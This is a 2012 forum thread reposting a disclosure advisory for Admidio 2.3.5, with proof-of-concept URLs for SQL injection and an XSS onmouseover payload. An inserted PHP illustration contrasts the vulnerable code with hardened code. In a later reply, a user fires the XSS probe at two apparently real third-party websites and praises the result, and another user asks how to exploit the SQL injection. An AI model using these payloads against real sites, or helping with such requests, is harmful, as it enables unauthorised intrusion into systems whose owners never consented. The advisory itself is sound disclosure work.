The_Arhitect Posted September 2, 2012

Admidio 2.3.5 Multiple Vulnerabilities

Advisory: Admidio 2.3.5 Multiple security vulnerabilities
Advisory ID: SSCHADV2012-019
Author: Stefan Schurtz
Affected Software: Successfully tested on Admidio 2.3.5
Vendor URL: http://www.admidio.org/
Vendor Status: fixed

==========================
Vulnerability Description
==========================
Admidio 2.3.5 is prone to XSS and SQLi vulnerabilities

==================
PoC-Exploit
==================
//SQLi
http://[target]/admidio-2.3.5/adm_program/modules/lists/lists.php?active_role=[sql-injection]

//XSS
http://[target]/admidio-2.3.5/adm_program/modules/guestbook/guestbook_new.php?headline=" onmouseover=alert(/xss/) "

=========
Solution
=========
Upgrade to the latest version 2.3.6

====================
Disclosure Timeline
====================
21-Aug-2012 - developer informed
21-Aug-2012 - feedback from developer
28-Aug-2012 - fixed in version 2.3.6

========
Credits
========
Vulnerabilities found and advisory written by Stefan Schurtz.

===========
References
===========
http://www.admidio.org/forum/viewtopic.php?t=5108
http://www.darksecurity.de/advisories/2012/SSCHADV2012-019.txt

Source: Admidio 2.3.5 Multiple Vulnerabilities
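The advisory names two classic parameter-handling bugs: a request parameter echoed unencoded into an HTML attribute (the headline XSS) and a request parameter concatenated into a SQL statement (the active_role SQLi). The following PHP is an added, hypothetical illustration of both patterns beside their hardened forms; it is not Admidio's code, and the table name `roles`, column `active`, function names and the constructed inputs are assumptions made for the example.

```php
<?php
// Added illustration (not Admidio's own code) of the two bug classes in the
// advisory, each beside a hardened version. All names here are hypothetical.

// Constructed inputs shaped like the advisory's PoC strings.
$headlineInput   = '" onmouseover=alert(/xss/) "';
$activeRoleInput = '1 OR 1=1';

// ---- 1. XSS in an HTML attribute context --------------------------------
// Weak: the parameter is dropped straight into value="...". A double quote in
// the input terminates the attribute and the remainder is parsed as markup.
function renderHeadlineWeak(string $headline): string
{
    return '<input type="text" name="headline" value="' . $headline . '">';
}

// Hardened: encode for the attribute context. ENT_QUOTES turns both ' and "
// into entities (along with < > &), so the input cannot leave the attribute.
function renderHeadlineSafe(string $headline): string
{
    $encoded = htmlspecialchars($headline, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
    return '<input type="text" name="headline" value="' . $encoded . '">';
}

// ---- 2. SQL injection through a numeric-looking parameter ---------------
// Weak: string concatenation; "1 OR 1=1" changes the WHERE clause.
function listQueryWeak(string $activeRole): string
{
    return 'SELECT * FROM roles WHERE active = ' . $activeRole;
}

// Hardened: the value is a flag, so reject anything that is not 0 or 1 before
// it reaches the database, then bind it as an integer with a prepared statement.
function listQuerySafe(PDO $db, string $activeRole): PDOStatement
{
    if (!preg_match('/^[01]$/', $activeRole)) {
        throw new InvalidArgumentException('active_role must be 0 or 1');
    }
    $stmt = $db->prepare('SELECT * FROM roles WHERE active = :active');
    $stmt->bindValue(':active', (int) $activeRole, PDO::PARAM_INT);
    $stmt->execute();
    return $stmt;
}

// Demonstration on the constructed inputs (no database needed for the XSS part).
echo "weak : " . renderHeadlineWeak($headlineInput) . PHP_EOL;
echo "safe : " . renderHeadlineSafe($headlineInput) . PHP_EOL;
echo "weak : " . listQueryWeak($activeRoleInput) . PHP_EOL;

try {
    // In-memory SQLite so the hardened query path can be exercised offline.
    $db = new PDO('sqlite::memory:');
    $db->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
    $db->exec('CREATE TABLE roles (id INTEGER PRIMARY KEY, active INTEGER)');
    $db->exec('INSERT INTO roles (active) VALUES (1), (0)');
    listQuerySafe($db, $activeRoleInput);
} catch (InvalidArgumentException $e) {
    echo "safe : rejected input (" . $e->getMessage() . ")" . PHP_EOL;
}
```

The hardened query rejects the PoC-style value outright instead of trying to sanitise it; for a parameter whose legal domain is that small, an allow-list check plus a bound integer parameter is both simpler and easier to audit than escaping.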
abraxyss Posted September 10, 2012 (edited)

http://herren1.bplaced.net/admidio/adm_program/modules/guestbook/guestbook_new.php?headline=%27
http://2b2x3.w4yserver.at/intern/adm_program/modules/guestbook/guestbook_new.php?headline='"+/>+mada+fa+KAms

it's great

Edited September 13, 2012 by abraxyss
KohCGI Posted September 10, 2012

How do you exploit that SQL?